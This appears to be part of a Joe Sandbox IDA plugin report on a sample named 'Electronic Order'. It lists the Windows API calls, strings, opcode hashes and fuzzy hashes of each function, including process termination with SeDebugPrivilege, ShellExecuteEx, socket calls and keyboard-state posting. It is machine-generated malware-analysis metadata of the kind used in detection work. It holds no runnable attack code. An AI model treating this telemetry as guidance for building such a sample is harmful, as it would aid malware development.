                                      • Instruction Fuzzy Hash: 1C910771D00229ABDB10DFA5DC85EDEBBB9EF08710F20415AF519B7281DB716A45CFA0
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E47093
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E470A7
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E470C1
                                      • _wcscat.LIBCMT ref: 00E4711C
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E47133
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E47161
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
                                      • Opcode ID: 5bf65c376d1d82315434495a1b5fd993ec99d8adfbaa5965c29f00eccc647171
                                      • Instruction ID: 4f4ce4e3d2a4a5630c301ee79e9a89aca459545cb1e7a8bbe91af700330fd235
                                      • Opcode Fuzzy Hash: 5bf65c376d1d82315434495a1b5fd993ec99d8adfbaa5965c29f00eccc647171
                                      • Instruction Fuzzy Hash: B941C470904308AFEB219F64DC85BEE77E8EF08754F10146AF588B7291D7729D848BA0
                                      APIs
                                        • Part of subcall function 00E23E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E23EB6
                                        • Part of subcall function 00E23E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E23EC4
                                        • Part of subcall function 00E23E91: CloseHandle.KERNEL32(00000000), ref: 00E23F8E
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E3ECB8
                                      • GetLastError.KERNEL32 ref: 00E3ECCB
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E3ECFA
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E3ED77
                                      • GetLastError.KERNEL32(00000000), ref: 00E3ED82
                                      • CloseHandle.KERNEL32(00000000), ref: 00E3EDB7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: aff39694c0c371b33ffa66b4dcd7a351c29adcc206b1a6d4025eb712e812c678
                                      • Instruction ID: fee3d50522ee76d276dc925cd14a13ceec78837eb209c5c11acf67ca38dedcc2
                                      • Opcode Fuzzy Hash: aff39694c0c371b33ffa66b4dcd7a351c29adcc206b1a6d4025eb712e812c678
                                      • Instruction Fuzzy Hash: 42419E712002019FDB15EF24C899F6EBBA1AF40714F088459F846AB3C2DBB5A849CBA1
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 00E232C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 9f29109feeda4ce8c20646e0d7f97de0e4a7143c8f2fc3364610273be822ae90
                                      • Instruction ID: 7e252cd8d5aa803d718f78e1ab7dbf86a0ea338dc7b05ab4283431bc8373349b
                                      • Opcode Fuzzy Hash: 9f29109feeda4ce8c20646e0d7f97de0e4a7143c8f2fc3364610273be822ae90
                                      • Instruction Fuzzy Hash: C91127332083A6FAE7056B65FC42CAEB3DCDF19774F20102AF504B6192E6A96B404DB5
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E2454E
                                      • LoadStringW.USER32(00000000), ref: 00E24555
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E2456B
                                      • LoadStringW.USER32(00000000), ref: 00E24572
                                      • _wprintf.LIBCMT ref: 00E24598
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E245B6
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00E24593
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      • Opcode ID: 54caf658e16f764c195cfcfa79a86a9795663913557ce060a19e30dfde20f37f
                                      • Instruction ID: de29a3fc3d7535bb8bd716e305b0c56e194cb086bbcc5d72aa5ca689271055c3
                                      • Opcode Fuzzy Hash: 54caf658e16f764c195cfcfa79a86a9795663913557ce060a19e30dfde20f37f
                                      • Instruction Fuzzy Hash: E7014FF6900218BFE710E7A59D89EE7776CDB08701F0005A5FB49F2152EA749E8A8B70
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • GetSystemMetrics.USER32(0000000F), ref: 00E4D78A
                                      • GetSystemMetrics.USER32(0000000F), ref: 00E4D7AA
                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E4D9E5
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E4DA03
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E4DA24
                                      • ShowWindow.USER32(00000003,00000000), ref: 00E4DA43
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E4DA68
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E4DA8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                      • String ID:
                                      • API String ID: 1211466189-0
                                      • Opcode ID: c73826263a4300b4e08e3c56af7b33daf3f07df93aa074b665d4bde39e5fc51e
                                      • Instruction ID: 463ed97cfc29d91d34a5f49d017d5bd1e2ad76a31db44bb98edc28c1d7e6308e
                                      • Opcode Fuzzy Hash: c73826263a4300b4e08e3c56af7b33daf3f07df93aa074b665d4bde39e5fc51e
                                      • Instruction Fuzzy Hash: B2B1B931604225EFDF18CF69D9897BD7BB1FF48704F08906AED48AB295D734A950CBA0
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000), ref: 00DC2ACF
                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000,000000FF), ref: 00DC2B17
                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000), ref: 00DFC46A
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00DFC417,00000004,00000000,00000000,00000000), ref: 00DFC4D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: 2634ff31b5000a9441e996304f3030927a3fd177de58da8962fa9d2d4300c4c6
                                      • Instruction ID: 5dec6f2bd67ea202fceb33d86be5cb70a68cae359bf5b9b571640ea6b540f7f4
                                      • Opcode Fuzzy Hash: 2634ff31b5000a9441e996304f3030927a3fd177de58da8962fa9d2d4300c4c6
                                      • Instruction Fuzzy Hash: 854128302146869EC7398B299D9CF7B3BA2AF86310F1DC81DE18BD75A0C675E856D730
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E2737F
                                        • Part of subcall function 00DE0FF6: std::exception::exception.LIBCMT ref: 00DE102C
                                        • Part of subcall function 00DE0FF6: __CxxThrowException@8.LIBCMT ref: 00DE1041
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E273B6
                                      • EnterCriticalSection.KERNEL32(?), ref: 00E273D2
                                      • _memmove.LIBCMT ref: 00E27420
                                      • _memmove.LIBCMT ref: 00E2743D
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E2744C
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E27461
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E27480
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 256516436-0
                                      • Opcode ID: 654f940c533b8641a682bdde28e0b6c7a49b875ffb93474d34ff6b884380d582
                                      • Instruction ID: ae1e818638874146054e8f31e7779c01a30164182c009d3b7bac9210e011b8b7
                                      • Opcode Fuzzy Hash: 654f940c533b8641a682bdde28e0b6c7a49b875ffb93474d34ff6b884380d582
                                      • Instruction Fuzzy Hash: AE31BA36A04205EFCF10EF66DC85AAFBBB8EF45710B1440A5F904AB256DB70DA54CBB0
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00E4645A
                                      • GetDC.USER32(00000000), ref: 00E46462
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E4646D
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E46479
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E464B5
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E464C6
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E49299,?,?,000000FF,00000000,?,000000FF,?), ref: 00E46500
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E46520
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 7644b319bb20a5dfed483ed40025add7fa8976e16f0586fa5e3314b82c03eb4c
                                      • Instruction ID: 74950ff54bebe326d35e6d76b7ba95a796a19fedc54a830f301ba5578cbb709c
                                      • Opcode Fuzzy Hash: 7644b319bb20a5dfed483ed40025add7fa8976e16f0586fa5e3314b82c03eb4c
                                      • Instruction Fuzzy Hash: 7E319176201210BFEF108F51DC49FEB3FA9EF4A765F050065FE08AA191C6759C42CBA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: dc772621cd8f864ef515af9c019135457c7a635c4f1a7369936ac3be7832444f
                                      • Instruction ID: b336449fd0a9ba94932f145175a8e7cee0ddbe1397fb3fba4f16fce38aaf5ce5
                                      • Opcode Fuzzy Hash: dc772621cd8f864ef515af9c019135457c7a635c4f1a7369936ac3be7832444f
                                      • Instruction Fuzzy Hash: CD21C5767C1305B7D210B5218C42FEB23ACEF15399B242028FE09F6283E761DD55C2B6
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                      • _wcstok.LIBCMT ref: 00E2EEFF
                                      • _wcscpy.LIBCMT ref: 00E2EF8E
                                      • _memset.LIBCMT ref: 00E2EFC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      • Opcode ID: d01ee4147a72ca99cd6919b097466c28a0ce152c8711e5885b549e7a82b70d05
                                      • Instruction ID: 4ab8f0d8e722325603aa938cba3d3b1e2d989587eb8a20aed5ce54f1e6bc4207
                                      • Opcode Fuzzy Hash: d01ee4147a72ca99cd6919b097466c28a0ce152c8711e5885b549e7a82b70d05
                                      • Instruction Fuzzy Hash: B7C1AF316083519FD724EF24D995E5AB7E4FF84314F00492DF899AB2A2DB30ED45CBA2
                                      APIs
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E36F14
                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E36F35
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E36F48
                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00E36FFE
                                      • inet_ntoa.WSOCK32(?), ref: 00E36FBB
                                        • Part of subcall function 00E1AE14: _strlen.LIBCMT ref: 00E1AE1E
                                        • Part of subcall function 00E1AE14: _memmove.LIBCMT ref: 00E1AE40
                                      • _strlen.LIBCMT ref: 00E37058
                                      • _memmove.LIBCMT ref: 00E370C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3619996494-0
                                      • Opcode ID: e3dd70e75b227c42a97909ea6b9349e67bcd4d1bf5374d0715af971542aa86af
                                      • Instruction ID: d8a3299e0f1824c17a4a5d37d6b806946abd39a1bc9cd410b99dad18b8cb539a
                                      • Opcode Fuzzy Hash: e3dd70e75b227c42a97909ea6b9349e67bcd4d1bf5374d0715af971542aa86af
                                      • Instruction Fuzzy Hash: 6481F171108301AFC724EB24CC99F6BBBE9EF84714F10851CF555AB292DA71AD45CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52b7b42cb65c9e5f8dad0cc539310a556fa8013dd2fd57ea9dd3be426d8cf8f6
                                      • Instruction ID: c023e70d1d4a52a7bc4bf21f752acfd3a0d993fcc4b91be944f056ca72d52d7e
                                      • Opcode Fuzzy Hash: 52b7b42cb65c9e5f8dad0cc539310a556fa8013dd2fd57ea9dd3be426d8cf8f6
                                      • Instruction Fuzzy Hash: 9E714B3890411AEFCB049F58C845EBEBB79FF86324F248159F915AB252C734AA51CFB4
                                      APIs
                                      • IsWindow.USER32(015A4E28), ref: 00E4B6A5
                                      • IsWindowEnabled.USER32(015A4E28), ref: 00E4B6B1
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E4B795
                                      • SendMessageW.USER32(015A4E28,000000B0,?,?), ref: 00E4B7CC
                                      • IsDlgButtonChecked.USER32(?,?), ref: 00E4B809
                                      • GetWindowLongW.USER32(015A4E28,000000EC), ref: 00E4B82B
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E4B843
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                      • String ID:
                                      • API String ID: 4072528602-0
                                      • Opcode ID: b7b8b356100c64cc7674248a83de4b49ebb2fc372ccc16213c47ccb39b853bb7
                                      • Instruction ID: ed42d88f36e028eeca0616da8357eb7bbfd3bb18c020a2646f79b33747645c02
                                      • Opcode Fuzzy Hash: b7b8b356100c64cc7674248a83de4b49ebb2fc372ccc16213c47ccb39b853bb7
                                      • Instruction Fuzzy Hash: F671BE34A00204AFDB249F65E898FAA7BB9FF89304F1551AAF949B7261C731E941CB50
                                      APIs
                                      • _memset.LIBCMT ref: 00E3F75C
                                      • _memset.LIBCMT ref: 00E3F825
                                      • ShellExecuteExW.SHELL32(?), ref: 00E3F86A
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                        • Part of subcall function 00DDFEC6: _wcscpy.LIBCMT ref: 00DDFEE9
                                      • GetProcessId.KERNEL32(00000000), ref: 00E3F8E1
                                      • CloseHandle.KERNEL32(00000000), ref: 00E3F910
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 3522835683-2766056989
                                      • Opcode ID: 561168bf373931c2b074348c9409bcd9f1f5d50be4978cc9bf856b94d49b427f
                                      • Instruction ID: fff7abb672548c1eb4b2f06408ca816d13e9d3e65b71335ac605b3ccb04cf8e1
                                      • Opcode Fuzzy Hash: 561168bf373931c2b074348c9409bcd9f1f5d50be4978cc9bf856b94d49b427f
                                      • Instruction Fuzzy Hash: 2B619E75E006199FCB18EF65C499AADBBB1FF48310F14846DE84ABB351CB30AD41CBA0
                                      APIs
                                      • GetParent.USER32(?), ref: 00E2149C
                                      • GetKeyboardState.USER32(?), ref: 00E214B1
                                      • SetKeyboardState.USER32(?), ref: 00E21512
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E21540
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E2155F
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E215A5
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E215C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 7c6630cbceb1ea23e939b8db73fb6129a401b1e52a340cb0a4792349cba7fa64
                                      • Instruction ID: 3aa9cca3c073b8cc97bb7e662cf59785b70439de040bb173a446382044b1398f
                                      • Opcode Fuzzy Hash: 7c6630cbceb1ea23e939b8db73fb6129a401b1e52a340cb0a4792349cba7fa64
                                      • Instruction Fuzzy Hash: A15104A0A447E53EFB3246349C05BBA7EE95B56308F0C54C9E1D9658C2C3E8DEC4D750
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00E212B5
                                      • GetKeyboardState.USER32(?), ref: 00E212CA
                                      • SetKeyboardState.USER32(?), ref: 00E2132B
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00E21357
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00E21374
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00E213B8
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00E213D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 8a72f88718ffe3962e1a9ef71d5ffb38cd8093a09726285c179b8a1e88ad517e
                                      • Instruction ID: 55f11056aff209d66c52adccbe898fba429e6b46df46c5766c61e3f6a2f246b4
